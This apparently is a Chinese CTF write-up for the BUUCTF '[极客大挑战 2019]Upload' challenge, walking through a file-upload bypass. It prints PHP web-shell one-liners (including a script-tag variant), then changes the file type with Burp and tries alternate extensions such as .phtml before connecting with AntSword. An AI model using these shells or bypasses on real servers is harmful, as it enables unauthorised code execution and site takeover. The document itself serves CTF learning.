BUUCTF (1)

[极客大挑战 2019]Upload

BUUCTF (1)


看到后的第一印象肯定是先上传图片马试试
<?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?>
BUUCTF (1)
构造的语句中不能带有<?这样的话只能是构造一些其他语句了
<script language="php">eval($_POST['shell']);</script>
BUUCTF (1)
上传的格式为image,使用bp抓包进行修改
![image.png](https://www.icode9.com/i/ll/?i=img_convert/fce2fb6ac3d11eb6ce6cf768e161d4d7.png#height=460&id=eKZCx&margin=[object Object]&name=image.png&originHeight=919&originWidth=1264&originalType=binary&ratio=1&size=177812&status=done&style=none&width=632)
修改文件名为php格式




绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
依此尝试
![image.png](https://www.icode9.com/i/ll/?i=img_convert/7ef192ca4c2719c2eff9ea73242d53b8.png#height=173&id=cdQj9&margin=[object Object]&name=image.png&originHeight=346&originWidth=768&originalType=binary&ratio=1&size=10048&status=done&style=none&width=384)


经过尝试.phtml格式可以上传
BUUCTF (1)


BUUCTF (1)




上传路径存在,使用蚁剑进行链接
BUUCTF (1)
BUUCTF (1)






这也太多了。。。。。终端进行搜索
BUUCTF (1)
BUUCTF (1)

上一篇:JavaScript学习笔记(四)——DOM


下一篇:buuctf-[极客大挑战 2019]Http 1